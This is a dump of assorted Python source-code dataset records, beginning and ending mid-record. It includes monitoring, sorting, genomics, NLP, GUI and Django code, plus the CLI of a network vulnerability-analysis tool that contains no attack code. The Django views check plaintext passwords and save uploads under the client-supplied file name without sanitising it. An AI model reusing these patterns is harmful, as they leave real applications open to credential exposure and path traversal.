(%s) port %s: %s\",\n self.cfg.manageIp,self.cfg.manageIp,self.cfg.port,\n reason.getErrorMessage())\n if self.deferred:\n self.deferred.callback(self)\n self.deferred = None\n\n def clientConnectionFailed(self,connector,reason):\n \"\"\"\n 功能:twisted框架,client类,连接失败处理函数\n 参数:twisted protocol对象,twisted error对象\n 作者:wl\n 时间:2013.1.30\n \"\"\"\n log.debug(\"Connection to %s (%s) port %s failed: %s\",\n self.cfg.manageIp,connector.host,self.cfg.port,\n reason.getErrorMessage())\n self.msg = \"IP Service %s已停止!\" % self.cfg.title\n if self.deferred:\n self.deferred.callback(self)\n self.deferred = None\n\n def getEvent(self):\n \"\"\"\n 功能:获取IP服务事件\n 作者:wl\n 时间:2013.1.30\n \"\"\"\n if self.msg == \"pass\" and self.status > 0:\n self.status = sev = 0\n self.msg = \"IP Service %s back up\" % self.cfg.title\n\n elif self.msg != \"pass\":\n self.status += 1\n sev = self.cfg.failSeverity\n\n else:\n self.status = sev = 0\n self.msg = \"IP Service %s back up\" % self.cfg.title\n\n return dict(manageIp = self.cfg.manageIp,\n\t\t\t\t deviceId = self.cfg.deviceId,\n title=self.cfg.title,\n cuid=self.cfg.cuid,\n component = self.cfg.component,\n componentType = self.cfg.componentType,\n ipAddress = self.cfg.manageIp,\n summary = self.msg,\n severity = sev,\n eventClass = \"\",\n eventGroup = \"TCPTest\",\n agent = \"netipservice\",\n manager = hostname)\n\n def start(self,ip_address):\n \"\"\"\n 功能:启动方法\n 参数:ip string\n 作者:wl\n 时间:2013.1.30\n \"\"\"\n d = self.deferred = defer.Deferred()\n reactor.connectTCP(ip_address.encode(\"idna\"),self.cfg.port,self,3)\n return d\n","sub_path":"products/netStatus/netTcpClient.py","file_name":"netTcpClient.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"134302711","text":"#2751번: 수 정렬하기 2\n#https://www.acmicpc.net/problem/2751\n\nimport sys\n\ncnt = int(sys.stdin.readline())\n\narr = []\nfor i in range(cnt):\n arr.append(int(sys.stdin.readline()))\n\ndef merge_sort(arr):\n if len(arr) < 2:\n return arr\n \n mid = len(arr)//2\n right = merge_sort(arr[:mid])\n left = merge_sort(arr[mid:])\n\n merged_arr = []\n l = h = 0\n while l < len(right) and h < len(left):\n if right[l] < left[h]:\n merged_arr.append(right[l])\n l += 1\n else:\n merged_arr.append(left[h])\n h += 1\n \n merged_arr += right[l:]\n merged_arr += left[h:]\n return merged_arr\n\n\narr = merge_sort(arr)\nfor i in arr:\n print(i)\n","sub_path":"12_정렬/[02]2751번_수정렬하기_2.py","file_name":"[02]2751번_수정렬하기_2.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441494808","text":"\"\"\"\nWrite out merge variant result\n\"\"\"\n\nwith open(\"../temp/VariantQC.txt\", \"w\") as FileOut:\n\n Header = ['CHROM', 'POS', 'ID',\n 'REF', 'ALT', 'QUAL',\n 'Coverage', 'nHet', 'nHomRef',\n 'nHomVar', 'nCalled', 'nNotCalled', '\\n']\n FileOut.write('\\t'.join(Header))\n\n First = True\n for StrIn in open(\"../temp/temp.txt\"):\n if First == True:\n First = False\n pass\n else:\n TempStr = StrIn.split('\\t')\n\n nHet = int(TempStr[7])\n for i in range(13,115,6):\n nHet += int(TempStr[i])\n\n nHomRef = int(TempStr[8])\n for i in range(14, 116, 6):\n nHomRef += int(TempStr[i])\n\n nHomVar = int(TempStr[9])\n for i in range(15, 117, 6):\n nHomVar += int(TempStr[i])\n\n nCalled = int(TempStr[10])\n for i in range(16, 118, 6):\n nCalled += int(TempStr[i])\n\n nNotCalled = int(TempStr[11])\n for i in range(17, 119, 6):\n nNotCalled += int(TempStr[i])\n\n StrOut = TempStr[0:7]\n StrOut.append( str(nHet) )\n StrOut.append( str(nHomRef) )\n StrOut.append( str(nHomVar) )\n StrOut.append( str(nCalled) )\n StrOut.append( str(nNotCalled) )\n StrOut.append( '\\n' )\n FileOut.write( '\\t'.join(StrOut) )\nFileOut.close()\n","sub_path":"1.QC_pipeline_local_HPC/Step4_Merge_Variant_2.py","file_name":"Step4_Merge_Variant_2.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"110021021","text":"from django.contrib import admin\n\nfrom subform.models import Owner, Submission, PdbRef, SubPdb, PubMedRef\n\n\n\nclass SubPdbInLine( admin.TabularInline ):\n model = SubPdb\n extra = 1\n\n\nclass SubPubMedInLine( admin.TabularInline ):\n model = PubMedRef.submission.through\n extra = 1\n\nclass PubMedRefAdmin( admin.ModelAdmin ):\n inlines = (SubPubMedInLine,)\n\nclass SubmissionAdmin( admin.ModelAdmin ):\n inlines = ( SubPdbInLine, SubPubMedInLine )\n\nclass PdbRefAdmin( admin.ModelAdmin ):\n inlines = (SubPdbInLine,)\n\nclass SubmissionInLine(admin.StackedInline):\n model = Submission\n #inlines = (SubPdbInLine)\n extra = 1\n\nclass OwnerAdmin(admin.ModelAdmin):\n #fields = ['myt_id', 'username', 'passwd', 'fname', 'lname', 'myt_server_url', 'email_addr' ]\n fieldsets = [\n\t( 'mytardis login info', { 'fields' : [ 'myt_id', 'username', 'passwd', 'myt_server_url' ] } ),\n\t( 'owner details', { 'fields' : [ 'fname', 'lname', 'email_addr' ]} )\n\t]\n inlines = [SubmissionInLine]\n\nadmin.site.register( Owner, OwnerAdmin )\nadmin.site.register( Submission, SubmissionAdmin )\nadmin.site.register( PdbRef, PdbRefAdmin )\nadmin.site.register( PubMedRef, PubMedRefAdmin )\n\n\n\n# Register your models here.\n","sub_path":"subform/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"414294091","text":"import glob\nimport logging\nimport json\nfrom stanfordcorenlp import StanfordCoreNLP\nfrom PetrXmlConverter import *\n\n\nclass FromCorenlpConverter(PetrXmlConverter):\n def __init__(self, input_path, output_path='', corenlp_path='', port=8000, memory='4g', lang='zh', timeout=1500,\n quiet=True, logging_level=logging.WARNING):\n PetrXmlConverter.__init__(self, input_path, output_path)\n\n self.corenlp_path = corenlp_path\n if self.corenlp_path == '' and not self.find_corenlp():\n raise IOError('Could not find stanford corenlp.')\n self.nlp = StanfordCoreNLP(self.corenlp_path, port, memory, lang, timeout, quiet, logging_level)\n\n print('\\033[1;32m'+'Starting up StanfordCoreNLP...'+'\\033[0m')\n\n def __del__(self):\n self.nlp.close()\n print('\\033[1;32m'+'Corenlp closed!'+'\\033[0m')\n\n def generate_events(self):\n with open(self.input_path, 'r') as source:\n for line in source.readlines():\n if not len(line) == 0:\n properties = line.replace('\\n', '').split('|')\n event = {\n Attr.id: properties[0],\n Attr.date: properties[4].split(' ')[0].replace('-', ''),\n Attr.source: properties[6],\n Attr.url: properties[9]\n }\n content = re.sub(r'\\s', '', properties[8])\n # parse = self.parse(content)\n # event[Attr.content] = self.sep_sentence(parse)\n event[Attr.content] = self.sep_sentence(content)\n print('parse event {0}'.format(event[Attr.id]))\n self.events.append(event)\n\n def parse(self, text):\n return self.nlp.parse(text)\n\n def find_corenlp(self):\n corenlp_paths = glob.glob(\"stanford-corenlp-full-[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]\")\n if len(corenlp_paths) == 0:\n return False\n else:\n corenlp_paths.sort()\n self.corenlp_path = corenlp_paths[-1]\n return True\n","sub_path":"FromCorenlpConverter.py","file_name":"FromCorenlpConverter.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"162048726","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\nimport os\n\nfrom core.controller import Controller\nfrom core.result_types import ResultType\nimport core.utility as util\n\n# The following metadata applies to all source code files of AVAIN\n__author__ = \"Dustin Born\"\n__version__ = \"0.1.2\"\n__license__ = \"MIT\"\n\n\nUSER_RESULT_ARGS = {ResultType.SCAN: (\"-sR\", \"--scan-results\"),\n ResultType.VULN_SCORE: (\"-vS\", \"--vulnerability-scores\"),\n ResultType.WEBSERVER_MAP: (\"-wM\", \"--webserver-map\")}\n\nclass Cli():\n\n def __init__(self):\n \"\"\"\n Create a Cli object.\n \"\"\"\n self.args = None\n self.user_results = {}\n self.verbose = True # make AVAIN verbose by default\n\n def parse_arguments(self):\n \"\"\"\n Parse the command line arguments using ArgumentParser\n\n :param args: the raw program arguments as a list (e.g. sys.argv)\n \"\"\"\n\n parser = argparse.ArgumentParser(description=\"Automated Vulnerability Analysis (in) IP-based \" +\n \"Networks - A toolkit for automatically assessing \" +\n \"the securtiy level of an IP-based network\", prog=\"avain\")\n optional_args = parser._action_groups.pop()\n required_args = parser.add_argument_group(\"required arguments (at least one)\")\n parser._action_groups.append(optional_args)\n\n required_args.add_argument(\"-n\", \"--networks\", nargs=\"+\", help=\"specify networks to scan \" +\n \"as plain IP address or IP address in CIDR, range or wildcard notation\")\n required_args.add_argument(\"-nL\", \"--network-list\", help=\"a list that specifies networks \" +\n \"to include into or exclude from the scan\")\n required_args.add_argument(\"-uM\", \"--update-modules\", action=\"store_true\", help=\"make \" +\n \"the modules that have an update mechanism update\")\n for rtype, args in USER_RESULT_ARGS.items():\n required_args.add_argument(args[0], args[1], nargs=\"+\", help=\"specify additional \" +\n \"%s results to include into the final scan result\" %\n rtype.value)\n\n optional_args.add_argument(\"-c\", \"--config\", help=\"specify a config file to use\")\n optional_args.add_argument(\"-o\", \"--output\", help=\"specify the output folder name\")\n optional_args.add_argument(\"-p\", \"--ports\", help=\"specify which ports to scan on every host\")\n optional_args.add_argument(\"-sN\", \"--single-network\", action=\"store_true\", help=\"operate \" +\n \"in single network mode meaning that all specified networks \" +\n \"are considered to be a subnet of one common supernet\")\n optional_args.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"enable verbose output\")\n optional_args.add_argument(\"-nV\", \"--non-verbose\", action=\"store_true\", help=\"disable verbose output\")\n\n self.args = parser.parse_args()\n\n # set verbosity (AVAIN is verbose by default)\n if self.args.non_verbose:\n self.verbose = False\n\n self.parse_user_results(parser)\n if (not self.args.networks) and (not self.args.network_list) and (not self.user_results) \\\n and (not self.args.update_modules):\n parser.error(\"at least one of the following arguments is required: -n/--network, \" +\n \"-nL/--network-list, -uD/--update-modules or any one of [%s]\" %\n \", \".join(\"%s/%s\" % rarg for rarg in USER_RESULT_ARGS.values()))\n\n self.parse_network_list(parser)\n self.validate_input(parser)\n\n def validate_input(self, parser: argparse.ArgumentParser):\n \"\"\"\n Validate the program arguments of the given ArgumentParser.\n\n :param parser: an ArgumentParser with input arguments\n \"\"\"\n\n if self.args.networks:\n for net in self.args.networks:\n if not util.is_valid_net_addr(net):\n parser.error(\"%s is not a valid network address\" % net)\n\n if self.args.network_list:\n for ip in self.args.add_networks:\n if not util.is_valid_net_addr(ip):\n parser.error(\"network %s on network list is not a valid network address\" % ip)\n for ip in self.args.omit_networks:\n if not util.is_valid_net_addr(ip):\n parser.error(\"network %s on network omit list is not a valid network address\" % ip)\n\n if self.args.output:\n pass # so far no limitation on output name\n\n if self.user_results:\n for rtype in ResultType:\n if rtype in self.user_results:\n filepaths = self.user_results[rtype]\n for filepath in filepaths:\n if not os.path.isfile(filepath):\n parser.error(\"specified %s result %s is not a file\" % (rtype.value, filepath))\n\n if self.args.config:\n if not os.path.isfile(self.args.config):\n parser.error(\"config %s does not exist\" % self.args.config)\n\n if self.args.ports:\n def check_port(port_expr: str):\n try:\n port_int = int(port_expr)\n if port_int < 0 or port_int > 65535:\n raise ValueError\n except ValueError:\n parser.error(\"port %s is not a valid port\" % port_expr)\n\n for port_expr in self.args.ports.split(\",\"):\n if \":\" in port_expr:\n port_expr = port_expr[port_expr.find(\":\")+1:]\n if \"-\" in port_expr:\n port_1, port_2 = port_expr.split(\"-\")\n check_port(port_1)\n check_port(port_2)\n if int(port_1) > int(port_2):\n parser.error(\"port range %s is not a valid port range\" % port_expr)\n else:\n check_port(port_expr)\n\n def start(self):\n \"\"\"\n Parse the program arguments and initiate the vulnerability analysis.\n \"\"\"\n\n controller = Controller(self.args.networks, self.args.add_networks, self.args.omit_networks,\n self.args.update_modules, self.args.config, self.args.ports,\n self.args.output, self.user_results, self.args.single_network,\n self.verbose)\n controller.run()\n\n def parse_network_list(self, parser: argparse.ArgumentParser):\n \"\"\"\n Parse the network list contained in the given ArgumentParser (if it exists).\n\n :param parser: an ArgumentParser processing program arguments\n \"\"\"\n\n self.args.add_networks, self.args.omit_networks = [], []\n if not self.args.network_list:\n return\n\n if not os.path.isfile(self.args.network_list):\n parser.error(\"network list %s does not exist\" % self.args.network_list)\n\n with open(self.args.network_list) as file:\n for line in file:\n line = line.strip()\n if line.startswith(\"+\"):\n self.args.add_networks.append(line[1:].strip())\n elif line.startswith(\"-\"):\n self.args.omit_networks.append(line[1:].strip())\n else:\n self.args.add_networks.append(line)\n\n def parse_user_results(self, parser: argparse.ArgumentParser):\n self.user_results = {}\n for rtype, args in USER_RESULT_ARGS.items():\n filepaths = vars(self.args).get(args[1][2:].replace(\"-\", \"_\"), None)\n if filepaths:\n for filepath in filepaths:\n if not filepath:\n parser.error(\"%s results specified, by no filepath was found\" % rtype.value)\n else:\n if rtype not in self.user_results:\n self.user_results[rtype] = []\n self.user_results[rtype].append(filepath)\n\n\ndef banner():\n print(\"|\" + \"-\" * 78 + \"|\")\n print(\n\"\"\"\\\n| |\n| ___ _ __ ___ ____ _ __ |\n| / || | / // | / _// | / / |\n| / /| || | / // /| | / / / |/ / |\n| / ___ || |/ // ___ | _/ / / /| / |\n| /_/ |_||___//_/ |_|/___//_/ |_/ |\n| |\\\n\"\"\")\n print(\"|\" + \" \" * 25 + \"[ Created by - Dustin Born ]\" + \" \" * 25 + \"|\")\n print(\"|\" + \"-\" * 78 + \"|\")\n print()\n\n\n#########################################\n### Entry point for the AVAIN program ###\n#########################################\nif __name__ == \"__main__\":\n banner()\n # Extend search path for modules\n MODULE_DIR = os.path.dirname(\"modules\")\n sys.path.append(MODULE_DIR)\n\n # Start program\n CLI = Cli()\n CLI.parse_arguments()\n CLI.start()\n","sub_path":"avain.py","file_name":"avain.py","file_ext":"py","file_size_in_byte":9339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"367541665","text":"# 使用函数和类两种方式,定义topsecret装饰器,用于装饰高度机密的函数;\n# 装饰器参数,int型机密等级level;\n# 用装饰器装饰的函数,必须输入执行密码才能执行;\n# 根据保密等级不同,密码的位数不同;\n# 用一个字典保存密码;\n# 定义一个发射核弹函数bomb(),用toplevel装饰,保密等级3;\n# 定义一个根据身份证号查询银行余额函数getAccountById(id),用toplevel装饰,保密等级2;\n##########################################################################\n\nfrom functools import wraps\n\n\nclass topsecret:\n LEVEL_MINISTER = 2\n LEVEL_PRESIDENT = 3\n\n pwds = {LEVEL_MINISTER: \"123\", LEVEL_PRESIDENT: \"123456\"}\n\n level = 0\n\n def __init__(self, level=0):\n self.level = level\n\n def __call__(self, func):\n @wraps(func)\n def inner(*args, **kwargs):\n pwd = input(\"Enter password:\")\n if pwd == topsecret.pwds[self.level]:\n print(\"校验成功!\")\n func(*args, **kwargs)\n print(\"发射成功!\")\n else:\n print(\"You have no authority!\")\n\n return inner\n\n\n@topsecret(level=topsecret.LEVEL_PRESIDENT)\ndef bomb(Giver):\n print(\"10,,,,,5,,3,2,1,ignition,\\n....................\\\n \\n................\\n............\\nBOOOOOOOOOOOOMB!!!!!!!!\")\n\n\n##########################################################################\n# LEVEL_MINISTER = 2\n# LEVEL_PRESIDENT = 3\n# pwds = {LEVEL_MINISTER: 123, LEVEL_PRESIDENT: 123456}\n# IdLibrary = [\n# 50010219951,\n# 50010219952,\n# 50010219953,\n# 50010219954,\n# 50010219955,\n# 50010219956,\n# 50010219957,\n# 50010219958,\n# 50010219959,\n# ]\n\n# def toplevel(level): # 接受装饰器参数\n# def wrapper(func): # 接受函数\n# def inner(*args): # 接受函数参数\n# if args[2] == pwds[args[1]]: # 函数参数传入后变为元组\n# for cad in IdLibrary:\n# if args[0] == cad:\n# print(\"ID校验成功\")\n# func(args[0])\n# break\n\n# return inner\n\n# return wrapper\n\n# @toplevel(level=LEVEL_MINISTER)\n# def getAccountById(ad):\n# print(ad, \", You have no money!\")\n\n##########################################################################\n\nif __name__ == '__main__':\n Giver = input(\"Enter you name:\")\n bomb(Giver)\n # ad, level, password = eval(input(\"Enter you ID,level,password:\"))\n # getAccountById(ad, level, password)\n","sub_path":"homework/python language programming/fire.py","file_name":"fire.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"180132976","text":"import wx\nimport scipy as sp\nimport imreg_dft as ird\nimport PyQt5\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QImage\nimport os\nfrom threading import Thread\nimport skimage\n\nThumbMaxSize = 360\nedges1File = 'image1edges.jpg'\nedges2File = 'image2edges.jpg'\nimage2scaledFile = \"image2scaled.jpg\"\noverlayFile = 'overlay.jpg'\nOutputMaxSize = 360\nNoFileSelected = \"No File Selected\"\n\n# Define File Drop Target class\nclass FileDropTarget(wx.FileDropTarget):\n\n def __init__(self, obj, imageCtrl, frame):\n \"\"\" Initialize the Drop Target, passing in the Object Reference to\n indicate what should receive the dropped files \"\"\"\n # Initialize the wxFileDropTarget Object\n wx.FileDropTarget.__init__(self)\n self.obj = obj\n self.imageCtrl = imageCtrl\n self.frame = frame\n\n def OnDropFiles(self, x, y, filenames):\n # display filename to gui\n self.obj.Clear()\n file = filenames[0]\n self.obj.WriteText(file)\n \n # read in image file\n img = wx.Image(file, wx.BITMAP_TYPE_ANY)\n\n # scale down image into a thumbnail\n W = img.GetWidth()\n H = img.GetHeight()\n if W > H:\n NewW = ThumbMaxSize\n NewH = ThumbMaxSize * H / W\n else:\n NewH = ThumbMaxSize\n NewW = ThumbMaxSize * W / H\n imgThumb = img.Scale(NewW,NewH)\n\n # assign image to image control\n self.imageCtrl.SetBitmap(wx.Bitmap(imgThumb))\n self.frame.Refresh()\n\n return True\n\nclass MainWindow(wx.Frame):\n \"\"\" This window displays the GUI Widgets. \"\"\"\n def __init__(self,parent,id,title):\n wx.Frame.__init__(self,parent, wx.ID_ANY, title, size = (800,900), style=wx.DEFAULT_FRAME_STYLE|wx.NO_FULL_REPAINT_ON_RESIZE)\n self.SetBackgroundColour(wx.WHITE)\n\n # define text\n wx.StaticText(self, -1, \"Drag and Drop Image File 1\", (10, 15))\n wx.StaticText(self, -1, \"Drag and Drop Image File 2\", (410, 15))\n self.text1 = wx.TextCtrl(self, -1, \"\", pos=(10,35), size=(360,20), style = wx.TE_READONLY)\n self.text2 = wx.TextCtrl(self, -1, \"\", pos=(410,35), size=(360,20), style = wx.TE_READONLY)\n self.text1.WriteText(NoFileSelected)\n self.text2.WriteText(NoFileSelected)\n self.alignStatus = wx.StaticText(self, -1, \"Aligning...Please Wait\", (520,485))\n self.alignStatus.Hide()\n\n # define images\n img1 = wx.Image(ThumbMaxSize,ThumbMaxSize)\n img2 = wx.Image(ThumbMaxSize,ThumbMaxSize)\n img3 = wx.Image(OutputMaxSize, OutputMaxSize)\n self.imageCtrl1 = wx.StaticBitmap(self, wx.ID_ANY, wx.Bitmap(img1), pos=(10,65))\n self.imageCtrl2 = wx.StaticBitmap(self, wx.ID_ANY, wx.Bitmap(img2), pos=(410,65))\n self.imageCtrl3 = wx.StaticBitmap(self, wx.ID_ANY, wx.Bitmap(img3), pos=(10,450))\n\n # Create a File Drop Target object\n dt1 = FileDropTarget(self.text1, self.imageCtrl1, self)\n dt2 = FileDropTarget(self.text2, self.imageCtrl2, self)\n\n # define check box and buttons\n self.detectEdges = wx.CheckBox(self, -1, \"Detect Edges\", pos = (410,450))\n buttonAlign = wx.Button(self, -1, \"Align\", pos=(410,480))\n buttonAlign.Bind(wx.EVT_BUTTON, self.onAlign)\n buttonCopyToClipboard = wx.Button(self, -1, \"Copy Image To Clipboard\", pos=(410,510))\n buttonCopyToClipboard.Bind(wx.EVT_BUTTON, self.onCopyToClipboard)\n\n # Link the Drop Target Object to the Image Control\n self.imageCtrl1.SetDropTarget(dt1)\n self.imageCtrl2.SetDropTarget(dt2)\n\n # Display the Window\n self.Show(True)\n\n def onAlign(self, button):\n # get paths\n path1 = self.text1.GetValue()\n path2 = self.text2.GetValue()\n \n if(path1 != NoFileSelected and path2 != NoFileSelected):\n detectEdges = self.detectEdges.GetValue()\n worker = AlignWorkerThread(self, path1, path2, detectEdges)\n\n def onCopyToClipboard(self, button):\n # check that im3 exists\n try:\n self.img3\n except:\n return\n\n # copy overlay image file to clipboard\n app = QtWidgets.QApplication([])\n data = QtCore.QMimeData()\n cwd = os.getcwd()\n overlayFilePath = os.path.join(cwd, overlayFile)\n url = QtCore.QUrl.fromLocalFile(overlayFilePath)\n data.setUrls([url])\n app.clipboard().setMimeData(data)\n\nclass AlignWorkerThread(Thread):\n \n def __init__(self, frame, path1, path2, detectEdgesBool):\n Thread.__init__(self)\n self.frame = frame\n self.path1 = path1\n self.path2 = path2\n self.detectEdgesBool = detectEdgesBool\n self.start()\n\n def detectEdges(self, path):\n img = skimage.io.imread(path)\n img_grey = skimage.color.rgb2grey(img)\n edge_sobel = skimage.filters.sobel(img_grey)\n edge_inverted = skimage.util.invert(edge_sobel)\n return edge_inverted\n\n def run(self):\n # this needs to be in a thread to not lock up the gui\n self.frame.alignStatus.Show() \n\n # apply edge detection to both input images\n if(self.detectEdgesBool):\n skim1edges = self.detectEdges(self.path1)\n skim2edges = self.detectEdges(self.path2)\n skimage.io.imsave(edges1File,skim1edges)\n skimage.io.imsave(edges2File,skim2edges)\n im1wx = wx.Image(edges1File, wx.BITMAP_TYPE_ANY)\n im2wx = wx.Image(edges2File, wx.BITMAP_TYPE_ANY)\n else:\n im1wx = wx.Image(self.path1, wx.BITMAP_TYPE_ANY)\n im2wx = wx.Image(self.path2, wx.BITMAP_TYPE_ANY)\n\n # scale image 2\n w1 = im1wx.GetWidth()\n h1 = im1wx.GetHeight()\n w2 = im2wx.GetWidth()\n h2 = im2wx.GetHeight()\n im2scaled = im2wx.Scale(w1,h1) # not a good scaling method\n im2scaled.SaveFile(image2scaledFile)\n\n # read in image 1 and scaled image 2\n if(self.detectEdgesBool):\n im1 = sp.misc.imread(edges1File,True)\n else:\n im1 = sp.misc.imread(self.path1,True)\n im2 = sp.misc.imread(image2scaledFile,True)\n\n # align image 2\n result = ird.similarity(im1, im2, numiter=3)\n assert \"timg\" in result\n im2aligned = result['timg']\n\n # overlay\n overlay = im1 + im2aligned\n sp.misc.imsave(overlayFile,overlay)\n\n # display overlay\n self.frame.img3 = wx.Image(overlayFile, wx.BITMAP_TYPE_ANY)\n img3thumb = self.frame.img3.Scale(OutputMaxSize,OutputMaxSize)\n self.frame.imageCtrl3.SetBitmap(wx.Bitmap(img3thumb))\n self.frame.Refresh()\n\n self.frame.alignStatus.Hide()\n\nclass MyApp(wx.App):\n def OnInit(self):\n frame = MainWindow(None, -1, \"Image Alignment Tool\")\n self.SetTopWindow(frame)\n return True\n\n# Declare the Application and start the Main Loop\napp = MyApp(0)\napp.MainLoop()","sub_path":"registrationGUI/imageRegGUI.py","file_name":"imageRegGUI.py","file_ext":"py","file_size_in_byte":6954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"349804937","text":"from math import pi\nimport matplotlib.pyplot as plt\n\ndef plot_count(feature, title,xlabel, df, size=1):\n f, ax = plt.subplots(1,1, figsize=(4*size,6))\n total = float(len(df))\n g = sns.countplot(df[feature], order = df[feature].value_counts().index[:30], palette='Set3')\n g.set_title(\"Distribution of {}\".format(title), fontsize = 16)\n if(size > 2):\n plt.xticks(rotation=90, size=8)\n for p in ax.patches:\n height = p.get_height()\n ax.text(p.get_x()+p.get_width()/2.,\n height + 3,\n '{:1.2f}%'.format(100*height/total),\n ha=\"center\")\n #plt.xlabel(xlabel, fontsize = 16)\n plt.xlabel('')\n plt.ylabel('Count', fontsize = 16)\n plt.xticks(fontsize = 16)\n plt.savefig(f'img/{title}.png', dpi = 500, bbox_inches = 'tight')\n plt.show()\n \ndef make_spider( df, row, title, color):\n # initialize the figure\n plt.figure(figsize=(10, 10))\n # number of variable\n categories=list(df)\n N = len(categories)\n\n # What will be the angle of each axis in the plot? (we divide the plot / number of variable)\n angles = [n / float(N) * 2 * pi for n in range(N)]\n\n # Initialise the spider plot\n ax = plt.subplot(1,1,row+1, polar=True, )\n\n # If you want the first axis to be on top:\n ax.set_theta_offset(pi / 2)\n ax.set_theta_direction(-1)\n\n # Draw one axe per variable + add labels labels yet\n plt.xticks(angles, categories, color='k', size=15)\n\n # Draw ylabels\n ax.set_rlabel_position(0)\n plt.yticks([0.05,.1,.15], [\"5\",\"10\",\"15\"], color=\"grey\", size=12)\n plt.ylim(0,0.2)\n# plt.yticks([0.1,.2,.3, 0.4, 0.5], [\"10\",\"20\",\"30\",\"40\", \"50\"], color=\"grey\", size=12)\n# plt.ylim(0,0.6)\n\n # Ind1\n values=df.loc[row].values.flatten().tolist()\n values += values[:1]\n angles += angles[:1]\n ax.plot(angles, values, color=color, linewidth=2, linestyle='solid')\n ax.fill(angles, values, color=color, alpha=0.4)\n\n # Add a title\n #plt.title(title, size=16, color=color, y=1.1)\n","sub_path":"visualizations.py","file_name":"visualizations.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"327641386","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django import forms\nimport sys\n\nfrom login.models import User\nfrom login.views import check_login\nimport json\n\n\n@check_login\ndef hello(request, name='index.html'):\n\n htmls = ['calendar.html', 'chart.html', 'file-manager.html', 'form.html', 'gallery.html', 'icon.html', 'index.html',\n 'login.html', 'messages.html', 'submenu.html''submenu2.html', 'submenu3.html', 'table.html', 'tasks.html',\n 'typography.html', 'ui.html', 'widgets.html', 'file_upload.html', '404.html', 'data_preview.html', 'algorithm_preview.html',\n \"run_manage.html\",\n \"algorithm_go.html\",'data.html']\n print(name, \"=====================================================\")\n if name in htmls:\n return render(request, name)\n else:\n return render(request, '404.html')\n\n\ndef login_user(request):\n print(\"LOGIN\")\n if request.method == 'POST':\n print(request.POST)\n all_data = request.POST\n print(all_data)\n exist = User.objects.filter(username=all_data['username'], password=all_data['password']).first()\n print('EXIST', exist)\n if exist:\n request.session['is_login'] = True # 设置session的随机字段值\n request.session['username'] = exist.username # 设置uname字段为登录用户\n return redirect('/index.html')\n else:\n return HttpResponse(\"账户或密码错误\")\n else:\n return render(request, 'login.html')\n\n\n@check_login\ndef upload(request):\n if request.method == 'POST':\n file_obj = request.FILES.get('file', None)\n print(file_obj.name)\n print(file_obj.size)\n with open('media/' + file_obj.name, 'wb') as f:\n for line in file_obj.chunks():\n f.write(line)\n f.close()\n\n data = dict()\n data['status'] = 1\n return HttpResponse(json.dumps(data), content_type='application/json')\n\n","sub_path":"web_gov/web_gov/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"270534044","text":"def convert(n, base):\n temp = \"0123456789ABCDEF\"\n q, r = divmod(n, base)\n\n if q == 0:\n return temp[r]\n else:\n return convert(q, base) + temp[r]\n\n\ndef solution(n, t, m, p):\n answer = ''\n temp =''\n for i in range(m*t):\n temp += convert(i,n)\n \n while len(answer) < t:\n answer += temp[p-1]\n p += m\n\n return answer\n\nn = 16\nt = 16 \nm = 2\np = 1\n\n\nprint(solution(n,t,m,p))","sub_path":"4.programmers/practice/Prog_2018_KAKAO_n진수게임.py","file_name":"Prog_2018_KAKAO_n진수게임.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"157711321","text":"'''\n2. Latin Translator\n Look at the following list of Latin words and their meanings.\n Latin English\n sinister left\n dexter right\n medium center\n Write a GUI program that translates the Latin words to English. The window should have\n three buttons, one for each Latin word. When the user clicks a button, the program displays \n the English translation in a label.\n'''\n\nimport tkinter as tk\nfrom functools import partial\n\ndef main():\n # Instantiate the window\n window = tk.Tk()\n\n # set the window geometry and title\n window.geometry('400x400')\n window.title('Latin Translator')\n\n # define the function to show the info\n def display_English(p_latin):\n # def blank labels to generate from for the dictionary\n labelLeft = None\n labelRight = None\n labelCenter = None\n # Define a translation dictionary with the Latin words as a key\n translation = {\n 'sinister' : {'English': 'left', 'label' : labelLeft, 'col' : 0},\n 'dexter' : {'English': 'right', 'label' : labelRight, 'col' : 2},\n 'medium' : {'English': 'center', 'label' : labelCenter, 'col' : 1}\n }\n # prepare the label to display\n translation[p_latin]['label'] = tk.Label(master=window, text=translation[p_latin]['English'])\n translation[p_latin]['label'].grid(column=translation[p_latin]['col'], row=3)\n\n # build a title header label for the window\n titleLatin = tk.Label(text='Latin')\n titleLatin.grid(row=0, column=1, padx=5, pady=5, sticky='nsew')\n titleEnglish = tk.Label(text='English')\n titleEnglish.grid(row=2, column=1, padx=5, pady=5, sticky='nsew')\n\n # Build the buttons that calls the display translation function when clicked\n buttonleft = tk.Button(text='sinister', command=partial(display_English, 'sinister'))\n buttonleft.grid(column=0, row=1, padx=10, pady=10)\n buttoncenter = tk.Button(text='medium', 